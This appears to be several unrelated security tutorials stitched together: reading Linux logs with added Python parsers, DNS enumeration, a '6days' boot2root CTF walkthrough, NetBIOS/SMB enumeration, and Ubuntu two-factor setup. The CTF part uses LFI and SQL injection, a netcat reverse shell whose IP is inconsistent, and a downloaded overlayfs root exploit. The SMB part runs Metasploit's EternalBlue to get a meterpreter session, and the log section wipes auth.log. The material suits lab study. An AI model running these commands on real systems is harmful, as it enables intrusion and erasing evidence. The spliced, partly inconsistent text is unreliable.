Log files are large and reading them all at once is not practical, so an administrator can use grep's after and before options to show context around a match.
Syntax: tail [options] filename | grep -A [number of lines] "string"

tail access.log | grep -A 2 "bwapp"

Here -A stands for after: besides each matching line it prints the 2 lines logged after the bwapp lines, which are the 2 wordpress lines shown in the image.


Similarly, apply the before filter:

tail access.log | grep -B 2 "wordpress"

Here -B stands for before: it prints the 2 lines logged before the wordpress lines, i.e. 2 bwapp lines, as shown in the image.
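The cat/tail/grep filtering above, as an added example that is not part of the original article: a small Common Log Format parser plus the three filters done with grep (by status code, by substring, and with after/before context), with the pitfall that a plain grep 200 also matches a URL or byte count. The log lines are constructed to resemble the dvwa, bwapp and wordpress browsing in the article; they were not taken from the author's server.

```python
# Added example; not part of the original article. A small Common Log Format
# parser plus the three filters done above with tail and grep: by status code,
# by substring, and with after/before context. The log lines are constructed
# to look like the dvwa / bwapp / wordpress browsing in the article; they were
# not taken from the author's server.
import re
from collections import Counter

CLF = re.compile(
    r'^(?P<host>\S+) (?P<ident>\S+) (?P<authuser>\S+) \[(?P<date>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<bytes>\d+|-)$'
)

SAMPLE_LOG = """\
192.168.0.104 - - [30/Aug/2017:10:25:16 -0700] "GET /dvwa/login.php HTTP/1.1" 200 1068
192.168.0.104 - - [30/Aug/2017:10:25:20 -0700] "GET /dvwa/2000.php HTTP/1.1" 404 492
192.168.0.104 - - [30/Aug/2017:10:26:01 -0700] "GET /bwapp/login.php HTTP/1.1" 200 200
192.168.0.104 - - [30/Aug/2017:10:26:05 -0700] "POST /bwapp/login.php HTTP/1.1" 302 -
192.168.0.104 - - [30/Aug/2017:10:27:10 -0700] "GET /wordpress/ HTTP/1.1" 200 5231
192.168.0.104 - - [30/Aug/2017:10:27:12 -0700] "GET /wordpress/wp-login.php HTTP/1.1" 200 3411
192.168.0.104 - - [30/Aug/2017:10:27:15 -0700] "GET /wordpress/nope HTTP/1.1" 404 288
"""
LINES = SAMPLE_LOG.splitlines()


def parse(line):
    """Split one CLF line into fields; status and bytes become ints (bytes is
    None for "-"). Returns None for lines that are not CLF."""
    m = CLF.match(line)
    if not m:
        return None
    e = m.groupdict()
    e["status"] = int(e["status"])
    e["bytes"] = None if e["bytes"] == "-" else int(e["bytes"])
    e["method"], _, rest = e["request"].partition(" ")
    e["path"] = rest.split(" ")[0]
    return e


def naive_grep(lines, needle):
    """What `grep 200` does: substring match anywhere on the line."""
    return [l for l in lines if needle in l]


def by_status(lines, code):
    """Match on the parsed status field only, so /dvwa/2000.php and a
    200-byte response do not count as HTTP 200."""
    return [e for e in map(parse, lines) if e and e["status"] == code]


def context(lines, needle, before=0, after=0):
    """grep -B/-A: the matching lines plus N neighbours, overlaps merged."""
    keep = set()
    for i, l in enumerate(lines):
        if needle in l:
            keep.update(range(max(0, i - before), min(len(lines), i + after + 1)))
    return [lines[i] for i in sorted(keep)]


def status_summary(lines):
    """Count status codes per client: many 404s from one host suggests a
    directory brute-force such as dirb."""
    return Counter((e["host"], e["status"]) for e in map(parse, lines) if e)


if __name__ == "__main__":
    print(len(naive_grep(LINES, "200")), "lines contain 200;",
          len(by_status(LINES, 200)), "are HTTP 200")
    for l in context(LINES, "bwapp", after=2):
        print(l)
    print(status_summary(LINES))
```

On a real access.log, replace LINES with open("/var/log/apache2/access.log") and the same functions apply line by line; combined-format logs (with referer and user agent appended) need two extra quoted groups on the end of the regex.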



Auth Log
The auth.log file holds system authorization information: user login attempts, both successful and failed, and the authentication method used to connect to the server, for example SSH logins between server and client.
Location: /var/log/auth.log

Again I used the echo command to clear all previous records from auth.log:
echo > auth.log


Suppose a client uses PuTTY for SSH login to the server.


If the client has valid credentials for SSH, the login succeeds. In the image you can see I logged in successfully, so on the server auth.log gains a new record for the successful SSH login.


The next image shows an access denied message, meaning the SSH login failed; this time auth.log gains a record for the failure.


Now let's read all the auth.log records for the client activity above with cat:
cat auth.log
In the image you can read the log lines for the successful and the failed login.
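Reading successful and failed SSH logins out of auth.log, as an added example that is not part of the original article: detection logic over the sshd lines, counting failures per source address, applying a brute-force threshold, and flagging the telling pattern of a success that follows a burst of failures from the same address. The lines are constructed in the standard sshd syslog format; they are not the author's auth.log.

```python
# Added example; not part of the original article. Detection logic over the
# sshd lines that auth.log collects: failures per source address, a simple
# brute-force threshold, and the pattern of a success that follows a burst of
# failures from the same address. The lines are constructed in the standard
# sshd format; they are not the author's auth.log.
import re
from collections import Counter

SSHD = re.compile(
    r"sshd\[\d+\]: (?P<result>Accepted|Failed) (?P<method>\w+) for "
    r"(?:invalid user )?(?P<user>\S+) from (?P<ip>\S+) port (?P<port>\d+)"
)

SAMPLE_AUTH = """\
Aug 30 10:30:01 ubuntu sshd[2345]: Accepted password for raj from 192.168.0.104 port 50122 ssh2
Aug 30 10:31:05 ubuntu sshd[2351]: Failed password for raj from 192.168.0.104 port 50130 ssh2
Aug 30 10:31:09 ubuntu sshd[2352]: Failed password for invalid user admin from 192.168.0.104 port 50131 ssh2
Aug 30 10:31:12 ubuntu sshd[2353]: Failed password for invalid user test from 192.168.0.104 port 50132 ssh2
Aug 30 10:31:15 ubuntu sshd[2354]: Failed password for root from 192.168.0.104 port 50133 ssh2
Aug 30 10:31:20 ubuntu sshd[2355]: Accepted password for root from 192.168.0.104 port 50134 ssh2
Aug 30 10:32:00 ubuntu sshd[2360]: Accepted publickey for raj from 192.168.0.105 port 50200 ssh2
Aug 30 10:32:30 ubuntu CRON[2370]: pam_unix(cron:session): session opened for user root by (uid=0)
"""
AUTH_LINES = SAMPLE_AUTH.splitlines()


def parse_sshd(line):
    """Return the sshd login fields, or None for lines that are not logins
    (cron sessions, sudo, systemd noise)."""
    m = SSHD.search(line)
    return m.groupdict() if m else None


def failures_by_ip(lines):
    """How many failed logins each source address produced."""
    return Counter(
        e["ip"] for e in map(parse_sshd, lines) if e and e["result"] == "Failed"
    )


def brute_force_sources(lines, threshold=3):
    """Addresses at or above the failure threshold: candidates for a block."""
    return sorted(ip for ip, n in failures_by_ip(lines).items() if n >= threshold)


def success_after_failures(lines, window=3):
    """Accepted logins preceded by at least `window` failures from the same
    address: the signature of a guess that finally worked. Returns
    (ip, user, method, failures_before_success) tuples in log order."""
    fails, hits = Counter(), []
    for e in map(parse_sshd, lines):
        if not e:
            continue
        if e["result"] == "Failed":
            fails[e["ip"]] += 1
        else:
            if fails[e["ip"]] >= window:
                hits.append((e["ip"], e["user"], e["method"], fails[e["ip"]]))
            fails[e["ip"]] = 0  # a success closes the current burst
    return hits


if __name__ == "__main__":
    print(failures_by_ip(AUTH_LINES))
    print(brute_force_sources(AUTH_LINES))
    print(success_after_failures(AUTH_LINES))
```

The same functions run unchanged over open("/var/log/auth.log"); on hosts that log through journald, feed them the output of journalctl -u ssh instead.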


Vsftpd Log

The vsftpd log records FTP logins, successful or failed.
Location: /var/log/vsftpd.log
I cleared the previous entries with echo and used WinSCP to log in to the FTP server. You can see the login succeeded, so a new record for the client login is created in vsftpd.log.


Now let's verify it in the vsftpd log file with cat. In the image you can see it recorded the client 192.168.0.104 as CONNECT.

cat vsftpd.log


System Log

syslog is a standard for system message logging. Administrators use syslog for system management and security auditing as well as for general informational, analysis and debugging messages. A wide variety of devices, such as printers and routers, and message receivers across many platforms use the syslog standard.
Location: /var/log/syslog
Use cat to read syslog as shown in the image:
cat syslog


APT Log
apt is the standard command-line package tool on Debian-based systems such as Ubuntu; it installs new software packages, upgrades existing ones, updates the package list index and can even upgrade the entire system.

Location: /var/log/apt
apt keeps its own log of every package installed or removed, in two files:

·         history.log: /var/log/apt/history.log
·         term.log: /var/log/apt/term.log

Now type the following command to read apt's history log:

cat /var/log/apt/history.log


In the image you can see the result, which lists software installations and updates together with the command line that requested them, which is useful when tracing what an intruder installed.

That was a brief theory of reading logs in the simplest way.
Source: Wikipedia.org

4 Ways to DNS Enumeration

Today we are going to perform DNS enumeration using the Kali Linux platform only; it has built-in tools for DNS enumeration. For this tutorial you must be aware of DNS servers and their records; if you are not, read our previous article “Setup DNS Penetration Testing Lab on Windows Server 2012”.

Nmap
The following command tries to discover hosts' services using the DNS Service Discovery protocol. It sends a multicast DNS-SD query and collects all the responses.

The script first sends a query for _services._dns-sd._udp.local to get a list of services. It then sends a follow-up query for each one to get more information.

nmap --script=broadcast-dns-service-discovery


From the screenshot you can see the services advertised over multicast DNS on the local network.


The following command tries to enumerate DNS hostnames by brute-force guessing of common subdomains. With the dns-brute.srv argument, dns-brute will also try to enumerate common DNS SRV records.

Wildcard records are listed as "*A" and "*AAAA" for IPv4 and IPv6 respectively.
nmap -T4 -p 53 --script dns-brute www.hackingarticles.in

From the screenshot you can see the discovered DNS hostnames.


By default a DNS server performs recursive queries on behalf of its DNS clients and of DNS servers that have forwarded client queries to it.
Attackers can abuse recursion to deny service on the DNS server and to use it as a reflector against others. Therefore, if a DNS server in your network is not intended to receive recursive queries, recursion should be disabled on that server.
The following command checks whether a DNS server allows queries for third-party names. Recursion is expected to be enabled on your own internal nameservers.
From https://technet.microsoft.com

nmap -Pn -sU -p 53 --script=dns-recursion 192.168.1.150

As a result you can see that recursion is enabled on the target.


The following command enumerates various common service (SRV) records for a given domain name. The service records contain the hostname, port and priority of the servers for a given service. The script enumerates: Active Directory Global Catalog, Exchange Autodiscovery, Kerberos KDC Service, Kerberos Passwd Change Service, LDAP Servers, SIP Servers, XMPP S2S and XMPP C2S.

nmap --script dns-srv-enum --script-args "dns-srv-enum.domain='google.com'"


DNSEnum

dnsenum is a multithreaded Perl script to enumerate the DNS information of a domain and to discover non-contiguous IP blocks.
OPERATIONS:
·         Get the host's address (A record).
·         Get the nameservers (threaded).
·         Get the MX records (threaded).
·         Perform AXFR (zone transfer) queries on the nameservers and get the BIND version (threaded).
·         Get extra names and subdomains via Google scraping (Google query = “allinurl: -www site:domain”).
·         Brute-force subdomains from a file; can also recurse on subdomains that have NS records (all threaded).
·         Calculate class C network ranges and perform whois queries on them (threaded).
·         Perform reverse lookups on net ranges (class C and/or whois net ranges) (threaded).
·         Write the IP blocks to the domain_ips.txt file.

The following command skips the reverse-lookup step and saves the output in XML format:
dnsenum --noreverse -o mydomain.xml hackingarticles.in


DNSRecon
DNSRecon can:
1.       Check all NS records for zone transfers
2.       Enumerate general DNS records for a given domain (MX, SOA, NS, A, AAAA, SPF and TXT)
3.       Perform common SRV record enumeration and top-level domain (TLD) expansion
4.       Check for wildcard resolution
5.       Brute-force subdomain and host A and AAAA records given a domain and a wordlist
6.       Perform PTR record lookups for a given IP range or CIDR
7.       Check a DNS server's cached records for A, AAAA and CNAME records, given a list of host records in a text file
8.       Enumerate common mDNS records in the local network, and enumerate hosts and subdomains using Google

The following command enumerates the DNS records of the target domain:
dnsrecon -d hackingarticles.in
You can see the result in the image below.


Fierce
Fierce is a reconnaissance tool: a Perl script that quickly scans domains (usually in just a few minutes, assuming no network lag) using several tactics, including zone transfer attempts and subdomain brute-forcing.

Type the following command for DNS enumeration of the target domain:
fierce -dns hackingarticles.in
From the screenshot you can see that we get almost the same results as from the tools above.

Hack the 6days VM (CTF Challenge)

Hello friends! Today we are going to take another CTF challenge, known as 6days. The credit for making this VM goes to “CanYouPwn.Me”; it is another boot2root challenge in which we have to execute the flag file to complete it. You can download this VM here.

Let’s Breach!!!

Let us start form getting to know the IP of VM (Here, I have it at 192.168.0.18 but you will have to find your own)

netdiscover


Use nmap for port enumeration:
nmap -sV 192.168.0.18


We find that port 80 is open, so we open this IP in our browser.




We find that this page may be vulnerable to LFI and RFI, so we use curl to carry out our attack.


We find that LFI is working on this site. Now we take a look at the config file to find the name of the database.


Taking a look at the config file, we find that the database is accessible through localhost, so we combine SQL injection with the LFI to access it. Port 80 is protected by a WAF, so we use port 8080 to reach localhost.


We find a username and password. We know that SSH is open, so we try this username and password to log in through SSH:
ssh andrea@192.168.0.18


Now we are connected through SSH, but when we try to run commands it seems that nothing works. It is possible that output is being redirected to /dev/null, so we use netcat to get a reverse shell.

We set up a listener on our system first:

nc -lvp 1234


Now we try to connect back using a netcat reverse shell:

nc -e /bin/sh 192.168.0.18 1234


Once we get the shell we can see the output of our commands. We also find that the OS is Ubuntu 12.04, which is vulnerable to the overlayfs exploit.



So we move to the /tmp/ folder, download the overlayfs exploit and save it as exploit.c:
cd /tmp/
wget https://www.exploit-db.com/download/37292  --no-check-certificate
mv 37292 exploit.c


We compile the file and save the binary as exploit, give it executable permission and then run it:
gcc -o exploit exploit.c
chmod 777 exploit
./exploit


Now we have root access. When we go back to the home directory we find an executable file called flag.


When we run the executable it shows us a congratulation message stating that we have completed the challenge.


Beginner Guide NetBIOS and SMB Enumeration on Windows

NetBIOS (Network Basic Input/Output System)
NetBIOS is a service which allows communication between applications, such as a printer or another computer, on an Ethernet or token ring network via a NetBIOS name.

A NetBIOS name is a 16-character name assigned to a computer in a workgroup; WINS uses it to resolve an IP address into a NetBIOS name and vice versa.

Workgroup VS Domain

Workgroup: a peer-to-peer network of at most 10 computers on the same LAN or subnet. It has no centralized administration, which means no computer has control over another computer; each user controls the resources and security locally on their own system.

Domain: a client/server network for up to 2000 computers anywhere in the world. The administrator manages the domain, its users and its resources. A user with an account on the domain can log on to any computer system in it without having an account on that computer.

NetBIOS provides three distinct services:
1.       Name service (NetBIOS-NS) for name registration and resolution via port 137.
2.       Datagram distribution service (NetBIOS-DGM) for connectionless communication via port 138.
3.       Session service (NetBIOS-SSN) for connection-oriented communication via port 139.


Port   Protocol   Service
135    TCP        MS-RPC endpoint mapper
137    UDP        NetBIOS Name Service
138    UDP        NetBIOS Datagram Service
139    TCP        NetBIOS Session Service
445    TCP        SMB Protocol

Port 135: used by the Microsoft Remote Procedure Call (MS-RPC) endpoint mapper, on which the server listens for client queries. Basically it is used for message exchange in client-client and client-server communication.

Port 137: the name service operates on UDP port 137. The name service primitives offered by NetBIOS are:
·         Add name - registers a NetBIOS name.
·         Add group name - registers a NetBIOS "group" name.
·         Delete name - un-registers a NetBIOS name or group name.
·         Find name - looks up a NetBIOS name on the network.


Port 138: Datagram mode is connectionless; the application is responsible for error detection and recovery. In NBT, the datagram service runs on UDP port 138. The datagram service primitives offered by NetBIOS are:
·         Send Datagram - send a datagram to a remote NetBIOS name.
·         Send Broadcast Datagram - send a datagram to all NetBIOS names on the network.
·         Receive Datagram - wait for a packet to arrive from a Send Datagram operation.
·         Receive Broadcast Datagram - wait for a packet to arrive from a Send Broadcast Datagram operation.

Port 139: Session mode lets two computers establish a connection, allows messages to span multiple packets, and provides error detection and recovery. In NBT, the session service runs on TCP port 139.
The session service primitives offered by NetBIOS are:
·         Call - opens a session to a remote NetBIOS name.
·         Listen - listen for attempts to open a session to a NetBIOS name.
·         Hang Up - close a session.
·         Send - sends a packet to the computer on the other end of a session.
·         Send No Ack - like Send, but doesn't require an acknowledgment.
·         Receive - wait for a packet to arrive from a Send on the other end of a session.


Port 445: used by the SMB (Server Message Block) protocol for sharing files between operating systems, i.e. Windows-Windows, Unix-Unix and Unix-Windows.
For more details read our previous article given below:




Scanning open ports for NetBIOS enumeration

We are using nmap to scan the target for open TCP and UDP ports and their protocols:
nmap -sT -sU 192.168.1.128

From the given image you can see that the scan found port 137 open for the NetBIOS name service; moreover, we got the MAC address of the target system.


What will happen if the admin shares a folder on the network?

Suppose we give share permission to a specific folder (for example ignite, as shown in the given image) so that we can share that folder with other users on the local network. Which ports will be involved in this process?


Now you can observe that we have got a link for our shared folder. Using that link anyone on that network can access the folder, which means a new port must have been opened to establish connections for accessing the shared folder from another system. Let's find out which.


Now we take the help of nmap again to scan the target one more time:
nmap -sT -sU 192.168.1.128

From the scan result you can observe that after sharing a folder, ports 135, 139 and 445 have become active.
Hence just by sharing a single folder on the network, three ports are opened simultaneously on the target system for communication with other systems.


Through Computer > Properties, a user can view basic information about their computer.
As you can perceive, we are sharing the image of the victim's Control Panel home, which shows his system's basic information such as computer name, workgroup, etc.


The same information can be enumerated from another system on that network using the following command:
nbtstat -a 192.168.1.128

Hence, by reading the NetBIOS remote machine name table, we have enumerated the same information as shown in the above image.


Apply a filter on ports 135-139 with the firewall

To increase the security of your system on your local network, you can add a filter on port 137 with the help of Windows Firewall. Because the port series from 135 to 139 is the most exposed, the administrator can block either the whole series or a specific port.

Select Inbound Rules and click on New Rule.


Select the Port radio button, which creates a new rule that controls connections for a TCP or UDP port.
Then click Next.


Select UDP to apply the rule to a UDP port.
Enter port 137 as the specific local port, then click Next. Here you can also add the complete series, for example: 135,137,138,139.


Choose Block the connection as the action to be taken when a connection matches the specified conditions.
This will not allow traffic on port 137, so if an attacker scans the victim's system he will not be able to find the NetBIOS name of the target system.

Click Next.


At last, give your new rule a name of your choice (as shown in the image, block nbtstat), then click Finish and you will see the new rule added to Windows Firewall.


Now scan the target system using the previous command:
nbtstat -a 192.168.1.128

This time it does not give any information related to NetBIOS. In the given image you can read the message “Host not found.”


Now let’s try to access the shared folder of the target (192.168.1.128) while port 137 is blocked by him, and figure out whether we are able to access the shared folder “ignite” or not, using the Run prompt.

From the given image you can see that we are able to access the ignite folder even after port 137 has been blocked by the admin on his network.

Conclusion: Although port 137 was blocked, sharing was still possible because the protocols on ports 139 and 445 were still running. Hence by blocking 137 the admin has added a security level that hides the NetBIOS name of his system (192.168.1.128) on the local network.


Block port 139

Similarly, use a firewall inbound rule again to block port 139, so that we can verify its impact on sharing between two or more systems. This adds a new rule to the firewall that stops traffic arriving on port 139.


Now again let’s try to access the shared folder of the target (192.168.1.128) while ports 137 and 139 are both blocked by him, and figure out whether we are able to access the shared folder “ignite” or not, using the Run prompt.

From the given image you can see that we are still able to access the ignite folder when port 139 has been blocked by the admin on his network.

Conclusion: Although ports 137 and 139 were both blocked, sharing was still possible because the protocol on port 445 was still running. Hence by blocking 139 the admin has added a security level that prevents the NetBIOS session service as well as NetBIOS enumeration.


In many organizations the port series from 135 to 139 is blocked on the network for security reasons, so port 445 is what is used for sharing data on the network. Now identify whether it is vulnerable to MS17-010 using Metasploit, as shown in the given image:
use auxiliary/scanner/smb/smb_ms17_010
msf auxiliary(smb_ms17_010) > set rhosts 192.168.1.128
msf auxiliary(smb_ms17_010) > set rport 445
msf auxiliary(smb_ms17_010) > exploit

From the result we find that the host is vulnerable to MS17-010, hence we can exploit the target easily.

For more scanning methods read our previous article here.


use exploit/windows/smb/ms17_010_eternalblue
msf exploit(ms17_010_eternalblue) > set rhost 192.168.1.128
msf exploit(ms17_010_eternalblue) > set rport 445
msf exploit(ms17_010_eternalblue) > set lhost 192.168.1.115
msf exploit(ms17_010_eternalblue) > exploit

This exploits the target system and gives a meterpreter session on it, as shown in the given image.

Conclusion: Enumeration plays an important role in network penetration testing because it fetches hidden information about the victim’s system as well as identifying weaknesses that may help in exploiting it.


How to secure Ubuntu Server using Google Authenticator

Hello friends, today we are going to implement two-factor authentication on Ubuntu. Two-factor authentication adds an extra layer of security. We are going to use Google Authenticator to implement it.
Before we start, be aware that once we have set this up, we will not be able to log into the account (or issue sudo commands) without a six-digit code from the authenticator. This adds another step for us. Remember, however, that this added step brings with it an extra layer of security we wouldn’t have otherwise.
First we are going to install the Google Authenticator PAM module on our Ubuntu system:

sudo apt-get install libpam-google-authenticator

After installing it we are going to configure our authenticator. Open /etc/pam.d/common-auth:
sudo gedit /etc/pam.d/common-auth

Add the line auth required pam_google_authenticator.so at the same place shown in the image.


Now install Google Authenticator on your smartphone.

Next, run the command google-authenticator in the terminal. Select yes for time-based authentication. In time-based authentication, an OTP is valid only for a particular period of time.

It will then generate a secret key and a QR code. You can either create the account manually on your phone by entering the key, or simply scan the QR code to set up the account.

Once you have created the account on your smartphone it will look something like this.

After creating the account on your smartphone, select yes in the terminal to update the Google Authenticator configuration file.

It will then ask several questions about the type of authentication you want; you can customize it according to your needs.
Now restart the system to check whether the authenticator is working.
From now on, whenever we try to log in it asks for the verification code that is shown on the smartphone.